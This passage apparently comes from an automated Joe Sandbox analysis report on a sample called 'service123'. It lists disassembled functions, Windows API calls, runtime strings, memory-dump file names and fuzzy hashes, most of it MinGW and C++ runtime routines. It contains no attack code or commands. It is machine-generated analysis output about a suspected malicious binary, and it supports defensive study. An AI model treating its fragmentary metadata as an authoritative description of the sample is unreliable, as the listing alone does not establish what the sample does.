Instruction Fuzzy Hash: 41111FB59006289BCB14DF55C4809DEB7B5AF65358F05C964D80977B01DB30EE49CFE0

Function 6C9DDD80 Relevance: 19.6, APIs: 13, Instructions: 77COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2565772802.000000006C9D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9D0000, based on PE: true

Associated: 00000005.00000002.2565757653.000000006C9D0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565852462.000000006CAAD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565870823.000000006CAAF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565903561.000000006CAF8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565919693.000000006CAF9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565937026.000000006CAFC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c9d0000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5fe2482c830eee9ded9460493a8ea6eab20a7d1ebb5a31b0fcc83bb6770a18bd
Instruction ID: 76f477f1998d574d8ab7d9e9105225e30a7d96e80ef3a5165ac2637cf423b399
Opcode Fuzzy Hash: 5fe2482c830eee9ded9460493a8ea6eab20a7d1ebb5a31b0fcc83bb6770a18bd
Instruction Fuzzy Hash: B421E475A0061D9BCF10DF65C8809DEB7B5AFA9358F1588A8D80977741D730EE49CFA0

Function 6C9E0310 Relevance: 18.2, APIs: 12, Instructions: 165COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,6CAA395F), ref: 6C9E034B
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,6CAA395F), ref: 6C9E0352
SetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,6CAA395F), ref: 6C9E0360

Memory Dump Source

Source File: 00000005.00000002.2565772802.000000006C9D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9D0000, based on PE: true

Associated: 00000005.00000002.2565757653.000000006C9D0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565852462.000000006CAAD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565870823.000000006CAAF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565903561.000000006CAF8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565919693.000000006CAF9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565937026.000000006CAFC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c9d0000_service123.jbxd

Similarity

API ID: ErrorLast$Value
String ID:
API String ID: 1883355122-0
Opcode ID: a4877efc5308d616746f9e1cd40525970efaaa7667aa88f4192c8b5c922a9bd3
Instruction ID: bad24c74c3c2bca06189a5487b7beb0ba7f13b44f61da83e0c51126aef9473f8
Opcode Fuzzy Hash: a4877efc5308d616746f9e1cd40525970efaaa7667aa88f4192c8b5c922a9bd3
Instruction Fuzzy Hash: 6151BD707083428FCB06EF69D5C464A77F5BFAA304F15A52CD89987B11EB30E846DB92

Function 00791940 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 129fileCOMMON

Download Yara Rule

APIs

fwrite.MSVCRT ref: 0079196F
vfprintf.MSVCRT ref: 0079198F
abort.MSVCRT ref: 00791994
VirtualQuery.KERNEL32 ref: 00791A2B

Strings

Mingw-w64 runtime failure:, xrefs: 00791968
Address %p has no image-section, xrefs: 00791AEB
VirtualProtect failed with code 0x%x, xrefs: 00791AA6
VirtualQuery failed for %d bytes at address %p, xrefs: 00791AD7

Memory Dump Source

Source File: 00000005.00000002.2565535527.0000000000791000.00000020.00000001.01000000.00000005.sdmp, Offset: 00790000, based on PE: true

Associated: 00000005.00000002.2565509432.0000000000790000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2565552997.000000000079A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2565569379.000000000079E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2565585320.00000000007A1000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_790000_service123.jbxd

Similarity

API ID: QueryVirtualabortfwritevfprintf
String ID: VirtualProtect failed with code 0x%x$ VirtualQuery failed for %d bytes at address %p$Address %p has no image-section$Mingw-w64 runtime failure:
API String ID: 2513968241-1534286854
Opcode ID: de26c7856d560e7eb0a6ff1adb81ff26c92a4ae317cc59b77484f03014a894f8
Instruction ID: c4e91577e9cb6bc31a498f38bf46ad2a0426b0fc64131ee369ec78dc4c86ce9d
Opcode Fuzzy Hash: de26c7856d560e7eb0a6ff1adb81ff26c92a4ae317cc59b77484f03014a894f8
Instruction Fuzzy Hash: 61515AB1505301DFCB10EF28E98565AFBE0FF84354F95C92DE4898B311D738A855CB96

Function 6C9DA690 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 129fileCOMMON

Download Yara Rule

APIs

fwrite.MSVCRT ref: 6C9DA6BF
vfprintf.MSVCRT ref: 6C9DA6DF
abort.MSVCRT ref: 6C9DA6E4
VirtualQuery.KERNEL32 ref: 6C9DA77B

Strings

Address %p has no image-section, xrefs: 6C9DA83B
VirtualProtect failed with code 0x%x, xrefs: 6C9DA7F6
Mingw-w64 runtime failure:, xrefs: 6C9DA6B8
VirtualQuery failed for %d bytes at address %p, xrefs: 6C9DA827

Memory Dump Source

Source File: 00000005.00000002.2565772802.000000006C9D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9D0000, based on PE: true

Associated: 00000005.00000002.2565757653.000000006C9D0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565852462.000000006CAAD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565870823.000000006CAAF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565903561.000000006CAF8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565919693.000000006CAF9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565937026.000000006CAFC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c9d0000_service123.jbxd

Similarity

API ID: QueryVirtualabortfwritevfprintf
String ID: VirtualProtect failed with code 0x%x$ VirtualQuery failed for %d bytes at address %p$Address %p has no image-section$Mingw-w64 runtime failure:
API String ID: 2513968241-1534286854
Opcode ID: 496a7333d7cff88bbc62e757c95605932351c50fe3fb3e65c4bebf8e5ddb5276
Instruction ID: eda1d9544974e4c49bd808f9bf02c95c8a5edd35792b67123e7e49f47720f109
Opcode Fuzzy Hash: 496a7333d7cff88bbc62e757c95605932351c50fe3fb3e65c4bebf8e5ddb5276
Instruction Fuzzy Hash: 97517CB19057019FC700DF29D48065ABBF4FF95318F46C91CE898AB710EB30E85ACB92

Function 6C9DE0A0 Relevance: 16.6, APIs: 11, Instructions: 98COMMON

Download Yara Rule

APIs

abort.MSVCRT(?,?,?,?,?,?,6C9DE2F4,?,?,?,?,?,?,00000000,00000001,6C9E008D), ref: 6CAA6D4C
abort.MSVCRT(?,?,?,?,?,?,6C9DE2F4,?,?,?,?,?,?,00000000,00000001,6C9E008D), ref: 6CAA6D51
abort.MSVCRT(?,?,?,?,?,?,6C9DE2F4,?,?,?,?,?,?,00000000,00000001,6C9E008D), ref: 6CAA6D56
abort.MSVCRT(?,?,?,?,?,?,6C9DE2F4,?,?,?,?,?,?,00000000,00000001,6C9E008D), ref: 6CAA6D5B
abort.MSVCRT(?,?,?,?,?,?,6C9DE2F4,?,?,?,?,?,?,00000000,00000001,6C9E008D), ref: 6CAA6D60
abort.MSVCRT(?,?,?,?,?,?,6C9DE2F4,?,?,?,?,?,?,00000000,00000001,6C9E008D), ref: 6CAA6D65
abort.MSVCRT(?,?,?,?,?,?,6C9DE2F4,?,?,?,?,?,?,00000000,00000001,6C9E008D), ref: 6CAA6D6A
abort.MSVCRT(?,?,?,?,?,?,6C9DE2F4,?,?,?,?,?,?,00000000,00000001,6C9E008D), ref: 6CAA6D6F
abort.MSVCRT(?,?,00000000,00000000,?,774CE010,6C9E038F), ref: 6CAA6D74
abort.MSVCRT(?,?,00000000,00000000,?,774CE010,6C9E038F), ref: 6CAA6D79
abort.MSVCRT(?,?,00000000,00000000,?,774CE010,6C9E038F), ref: 6CAA6D7E

Memory Dump Source

Source File: 00000005.00000002.2565772802.000000006C9D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9D0000, based on PE: true

Associated: 00000005.00000002.2565757653.000000006C9D0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565852462.000000006CAAD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565870823.000000006CAAF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565903561.000000006CAF8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565919693.000000006CAF9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565937026.000000006CAFC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c9d0000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: 08f0fdecd6f72d3259056c723749615ba8504dc668cca0773edc8566e9b3ef45
Instruction ID: fb5d8ae3120e9a17b7d0c62892f4f396e81b00f1d8b5d8cfeeb19085604a1105
Opcode Fuzzy Hash: 08f0fdecd6f72d3259056c723749615ba8504dc668cca0773edc8566e9b3ef45
Instruction Fuzzy Hash: FB213532349619CBC704CF58D881696B3A6EBC632872DC2BEE4488BB15D637F807C790

Function 6C9DE570 Relevance: 15.1, APIs: 10, Instructions: 145COMMON

Download Yara Rule

APIs

abort.MSVCRT(?,?,?,?,?,?,6C9DE2F4,?,?,?,?,?,?,00000000,00000001,6C9E008D), ref: 6CAA6D51
abort.MSVCRT(?,?,?,?,?,?,6C9DE2F4,?,?,?,?,?,?,00000000,00000001,6C9E008D), ref: 6CAA6D56
abort.MSVCRT(?,?,?,?,?,?,6C9DE2F4,?,?,?,?,?,?,00000000,00000001,6C9E008D), ref: 6CAA6D5B
abort.MSVCRT(?,?,?,?,?,?,6C9DE2F4,?,?,?,?,?,?,00000000,00000001,6C9E008D), ref: 6CAA6D60
abort.MSVCRT(?,?,?,?,?,?,6C9DE2F4,?,?,?,?,?,?,00000000,00000001,6C9E008D), ref: 6CAA6D65
abort.MSVCRT(?,?,?,?,?,?,6C9DE2F4,?,?,?,?,?,?,00000000,00000001,6C9E008D), ref: 6CAA6D6A
abort.MSVCRT(?,?,?,?,?,?,6C9DE2F4,?,?,?,?,?,?,00000000,00000001,6C9E008D), ref: 6CAA6D6F
abort.MSVCRT(?,?,00000000,00000000,?,774CE010,6C9E038F), ref: 6CAA6D74
abort.MSVCRT(?,?,00000000,00000000,?,774CE010,6C9E038F), ref: 6CAA6D79
abort.MSVCRT(?,?,00000000,00000000,?,774CE010,6C9E038F), ref: 6CAA6D7E

Memory Dump Source

Source File: 00000005.00000002.2565772802.000000006C9D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9D0000, based on PE: true

Associated: 00000005.00000002.2565757653.000000006C9D0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565852462.000000006CAAD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565870823.000000006CAAF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565903561.000000006CAF8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565919693.000000006CAF9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565937026.000000006CAFC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c9d0000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: 9dd2c658d3c2cb619c7bf21bb267980a7d57e1b10d09043a9d0bcde5e8cf3aa6
Instruction ID: ffa60746a7efe9ea45bd9a43a226169334cf371f34048f4f64a9bbc538957714
Opcode Fuzzy Hash: 9dd2c658d3c2cb619c7bf21bb267980a7d57e1b10d09043a9d0bcde5e8cf3aa6
Instruction Fuzzy Hash: E3410370508B068BD710DF28C04076AF7E5AF91358F96CA19F4A4A7A95E334E94ACBD2

Function 6C9DE59B Relevance: 15.1, APIs: 10, Instructions: 89COMMON

Download Yara Rule

APIs

abort.MSVCRT(?,?,?,?,?,?,6C9DE2F4,?,?,?,?,?,?,00000000,00000001,6C9E008D), ref: 6CAA6D51
abort.MSVCRT(?,?,?,?,?,?,6C9DE2F4,?,?,?,?,?,?,00000000,00000001,6C9E008D), ref: 6CAA6D56
abort.MSVCRT(?,?,?,?,?,?,6C9DE2F4,?,?,?,?,?,?,00000000,00000001,6C9E008D), ref: 6CAA6D5B
abort.MSVCRT(?,?,?,?,?,?,6C9DE2F4,?,?,?,?,?,?,00000000,00000001,6C9E008D), ref: 6CAA6D60
abort.MSVCRT(?,?,?,?,?,?,6C9DE2F4,?,?,?,?,?,?,00000000,00000001,6C9E008D), ref: 6CAA6D65
abort.MSVCRT(?,?,?,?,?,?,6C9DE2F4,?,?,?,?,?,?,00000000,00000001,6C9E008D), ref: 6CAA6D6A
abort.MSVCRT(?,?,?,?,?,?,6C9DE2F4,?,?,?,?,?,?,00000000,00000001,6C9E008D), ref: 6CAA6D6F
abort.MSVCRT(?,?,00000000,00000000,?,774CE010,6C9E038F), ref: 6CAA6D74
abort.MSVCRT(?,?,00000000,00000000,?,774CE010,6C9E038F), ref: 6CAA6D79
abort.MSVCRT(?,?,00000000,00000000,?,774CE010,6C9E038F), ref: 6CAA6D7E

Memory Dump Source

Source File: 00000005.00000002.2565772802.000000006C9D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9D0000, based on PE: true

Associated: 00000005.00000002.2565757653.000000006C9D0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565852462.000000006CAAD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565870823.000000006CAAF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565903561.000000006CAF8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565919693.000000006CAF9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565937026.000000006CAFC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c9d0000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: 602950868eee7070e08be62886ca486b6e553905e997eb949550a7b66955e2bd
Instruction ID: 0174188dd0287d3b017cb2227c0e9b08a864cf02357856d155d727c279b1b6a0
Opcode Fuzzy Hash: 602950868eee7070e08be62886ca486b6e553905e997eb949550a7b66955e2bd
Instruction Fuzzy Hash: 4321C970505F024BDB50DE28C05066AF7E9AF51758FA6CE09E4A4B7A45E330F94ACBD2

Function 6C9DE714 Relevance: 15.0, APIs: 10, Instructions: 35COMMON

Download Yara Rule

APIs

abort.MSVCRT(?,?,?,?,?,?,6C9DE2F4,?,?,?,?,?,?,00000000,00000001,6C9E008D), ref: 6CAA6D51
abort.MSVCRT(?,?,?,?,?,?,6C9DE2F4,?,?,?,?,?,?,00000000,00000001,6C9E008D), ref: 6CAA6D56
abort.MSVCRT(?,?,?,?,?,?,6C9DE2F4,?,?,?,?,?,?,00000000,00000001,6C9E008D), ref: 6CAA6D5B
abort.MSVCRT(?,?,?,?,?,?,6C9DE2F4,?,?,?,?,?,?,00000000,00000001,6C9E008D), ref: 6CAA6D60
abort.MSVCRT(?,?,?,?,?,?,6C9DE2F4,?,?,?,?,?,?,00000000,00000001,6C9E008D), ref: 6CAA6D65
abort.MSVCRT(?,?,?,?,?,?,6C9DE2F4,?,?,?,?,?,?,00000000,00000001,6C9E008D), ref: 6CAA6D6A
abort.MSVCRT(?,?,?,?,?,?,6C9DE2F4,?,?,?,?,?,?,00000000,00000001,6C9E008D), ref: 6CAA6D6F
abort.MSVCRT(?,?,00000000,00000000,?,774CE010,6C9E038F), ref: 6CAA6D74
abort.MSVCRT(?,?,00000000,00000000,?,774CE010,6C9E038F), ref: 6CAA6D79
abort.MSVCRT(?,?,00000000,00000000,?,774CE010,6C9E038F), ref: 6CAA6D7E

Memory Dump Source

Source File: 00000005.00000002.2565772802.000000006C9D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9D0000, based on PE: true

Associated: 00000005.00000002.2565757653.000000006C9D0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565852462.000000006CAAD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565870823.000000006CAAF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565903561.000000006CAF8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565919693.000000006CAF9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565937026.000000006CAFC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c9d0000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: 9e089e6cd6cd64aa5b62a2a55d0ff6e4215562d1fbf434e16bed1c0db5fcfaf7
Instruction ID: a94f396294f7a7e6102967a44fa4f74ae98b3bf45b89ae16287073d1d2f0ad7c
Opcode Fuzzy Hash: 9e089e6cd6cd64aa5b62a2a55d0ff6e4215562d1fbf434e16bed1c0db5fcfaf7
Instruction Fuzzy Hash: 6AE08671488E198BCB11DE28C0515D5F7D99F6A388B82C90AD4D5B7E14D330F94BCAC6

Function 6C9E9249 Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 31libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 6C9E9260
GetProcAddress.KERNEL32 ref: 6C9E927A
LoadLibraryW.KERNEL32 ref: 6C9E929F
GetProcAddress.KERNEL32 ref: 6C9E92B3

Strings

advapi32.dll, xrefs: 6C9E9298
msvcrt.dll, xrefs: 6C9E9255
rand_s, xrefs: 6C9E926F
SystemFunction036, xrefs: 6C9E92A8

Memory Dump Source

Source File: 00000005.00000002.2565772802.000000006C9D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9D0000, based on PE: true

Associated: 00000005.00000002.2565757653.000000006C9D0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565852462.000000006CAAD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565870823.000000006CAAF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565903561.000000006CAF8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565919693.000000006CAF9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565937026.000000006CAFC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c9d0000_service123.jbxd

Similarity

API ID: AddressProc$HandleLibraryLoadModule
String ID: SystemFunction036$advapi32.dll$msvcrt.dll$rand_s
API String ID: 384173800-4041758303
Opcode ID: 445d578bc0f6e2e091d8d49b80b4c824ef117a4a2b5a6580131f75994ef125d2
Instruction ID: 2428ee62187e5630e0c26b725f27d2d0a7872725db68c11f39a07653754bbd78
Opcode Fuzzy Hash: 445d578bc0f6e2e091d8d49b80b4c824ef117a4a2b5a6580131f75994ef125d2
Instruction Fuzzy Hash: 97F04FB19543418BCF00BFBC964624A7FB4BB46320F02492DD8C5A7300D330D455CB67

Function 6CA6F8C0 Relevance: 13.7, APIs: 8, Strings: 1, Instructions: 224COMMON

Download Yara Rule

APIs

memmove.MSVCRT(?,?,?,?,?,?,?,?,?,?,00000000,?,?,6CA4DA2E), ref: 6CA6F95D
memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,00000000,?,?,6CA4DA2E), ref: 6CA6F988
memmove.MSVCRT ref: 6CA6F9D7
memmove.MSVCRT(?,?,?,?,?,?,?,?,?,?,00000000,?,?,6CA4DA2E), ref: 6CA6FA0D
memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,00000000,?,?,6CA4DA2E), ref: 6CA6FA58

Strings

basic_string::_M_replace, xrefs: 6CA6FBB6

Memory Dump Source

Source File: 00000005.00000002.2565772802.000000006C9D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9D0000, based on PE: true

Associated: 00000005.00000002.2565757653.000000006C9D0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565852462.000000006CAAD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565870823.000000006CAAF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565903561.000000006CAF8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565919693.000000006CAF9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565937026.000000006CAFC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c9d0000_service123.jbxd

Similarity

API ID: memmove$memcpy
String ID: basic_string::_M_replace
API String ID: 3033661859-2323331477
Opcode ID: c5737172006d8e121fd7f31c204fa9f51fb7b56d38d89fb00a7336d02ecdbb56
Instruction ID: 9fb651a1906024c63ade799a83b28fcf8cd427bf626614f6d9fe15248ad48d8a
Opcode Fuzzy Hash: c5737172006d8e121fd7f31c204fa9f51fb7b56d38d89fb00a7336d02ecdbb56
Instruction Fuzzy Hash: CC81577160D3519FC301CF2EC58065EFBE2AFDA244F24881EE4E597B15D232D888CB92

Function 6C9DFEE0 Relevance: 13.7, APIs: 9, Instructions: 186synchronizationCOMMON

Download Yara Rule

APIs

CreateSemaphoreW.KERNEL32 ref: 6C9E00D2
WaitForSingleObject.KERNEL32 ref: 6C9E0117

Memory Dump Source

Source File: 00000005.00000002.2565772802.000000006C9D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9D0000, based on PE: true

Associated: 00000005.00000002.2565757653.000000006C9D0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565852462.000000006CAAD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565870823.000000006CAAF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565903561.000000006CAF8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565919693.000000006CAF9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565937026.000000006CAFC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c9d0000_service123.jbxd

Similarity

API ID: CreateObjectSemaphoreSingleWait
String ID:
API String ID: 1168595426-0
Opcode ID: 4e3823c252b5df6e3b2b4fc9b479b4ae955266786531dbe481df3d805d899648
Instruction ID: d5b52a77849470a91817d9b763ada3c0f49c3420ea24ac3e8e5a72e64bb8671a
Opcode Fuzzy Hash: 4e3823c252b5df6e3b2b4fc9b479b4ae955266786531dbe481df3d805d899648
Instruction Fuzzy Hash: 9661AA70709706CFDB15DFA9E54035AB7F8AF5A30CF01C529E8689BA40DB70E85ACB52

Function 6C9DE760 Relevance: 13.6, APIs: 9, Instructions: 67COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2565772802.000000006C9D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9D0000, based on PE: true

Associated: 00000005.00000002.2565757653.000000006C9D0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565852462.000000006CAAD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565870823.000000006CAAF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565903561.000000006CAF8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565919693.000000006CAF9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565937026.000000006CAFC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c9d0000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 06e0c648a8d817803f94ec4fed503a03ca8cf05461f9862a5274ef0ffe4ad900
Instruction ID: 3b8534d41e226b7e5e86181065a0b9ca837de7bff947fedfe384deaa12ec7ee3
Opcode Fuzzy Hash: 06e0c648a8d817803f94ec4fed503a03ca8cf05461f9862a5274ef0ffe4ad900
Instruction Fuzzy Hash: FC01A575A09616CFC740CE18C480A9AF7E5AB95714F06DD29F485A7B14D234F8CAC7C2

Function 00792BF0 Relevance: 12.7, APIs: 5, Strings: 2, Instructions: 407COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00792CC1

Strings

0, xrefs: 0079313E
o, xrefs: 007930A8

Memory Dump Source

Source File: 00000005.00000002.2565535527.0000000000791000.00000020.00000001.01000000.00000005.sdmp, Offset: 00790000, based on PE: true

Associated: 00000005.00000002.2565509432.0000000000790000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2565552997.000000000079A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2565569379.000000000079E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2565585320.00000000007A1000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_790000_service123.jbxd

Similarity

API ID: memset
String ID: 0$o
API String ID: 2221118986-4157579757
Opcode ID: 5a2ef28bdbcba101e83cdabdda6d05f5f0490c8583f277cf0ba504eb215e70c5
Instruction ID: 56d47f81a3856a4f32cb31e9b20d031fa1ef9b1056969709902e8faee9bd003e
Opcode Fuzzy Hash: 5a2ef28bdbcba101e83cdabdda6d05f5f0490c8583f277cf0ba504eb215e70c5
Instruction Fuzzy Hash: B1F19071A04609DFCF14DF68D48469DBBF2BF89360F198229D854AB396D338ED46CB90

Function 6C9E32C0 Relevance: 12.7, APIs: 5, Strings: 2, Instructions: 407COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 6C9E3391

Strings

0, xrefs: 6C9E380E
o, xrefs: 6C9E3778

Memory Dump Source

Source File: 00000005.00000002.2565772802.000000006C9D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9D0000, based on PE: true

Associated: 00000005.00000002.2565757653.000000006C9D0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565852462.000000006CAAD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565870823.000000006CAAF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565903561.000000006CAF8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565919693.000000006CAF9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565937026.000000006CAFC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c9d0000_service123.jbxd

Similarity

API ID: memset
String ID: 0$o
API String ID: 2221118986-4157579757
Opcode ID: 00cb2d98c6e32ca29e5df2379417918a183b51e8976e900d5a5783c2af379635
Instruction ID: cbaa249917423621b170251491c4e57affcace7f44e4fcf170f97dae4671b2cc
Opcode Fuzzy Hash: 00cb2d98c6e32ca29e5df2379417918a183b51e8976e900d5a5783c2af379635
Instruction Fuzzy Hash: 11F19F71A042098FCB02CF79C4806DDBBF6BF9D364F198269D858ABB61D734E945CB90

Function 007914E0 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 43libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32 ref: 007914F0
LoadLibraryA.KERNEL32 ref: 00791506
GetProcAddress.KERNEL32 ref: 00791525
GetProcAddress.KERNEL32 ref: 00791537

Strings

libgcc_s_dw2-1.dll, xrefs: 007914E9, 007914FF
__register_frame_info, xrefs: 0079151A
__deregister_frame_info, xrefs: 0079152C

Memory Dump Source

Source File: 00000005.00000002.2565535527.0000000000791000.00000020.00000001.01000000.00000005.sdmp, Offset: 00790000, based on PE: true

Associated: 00000005.00000002.2565509432.0000000000790000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2565552997.000000000079A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2565569379.000000000079E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2565585320.00000000007A1000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_790000_service123.jbxd

Similarity

API ID: AddressProc$HandleLibraryLoadModule
String ID: __deregister_frame_info$__register_frame_info$libgcc_s_dw2-1.dll
API String ID: 384173800-1835852900
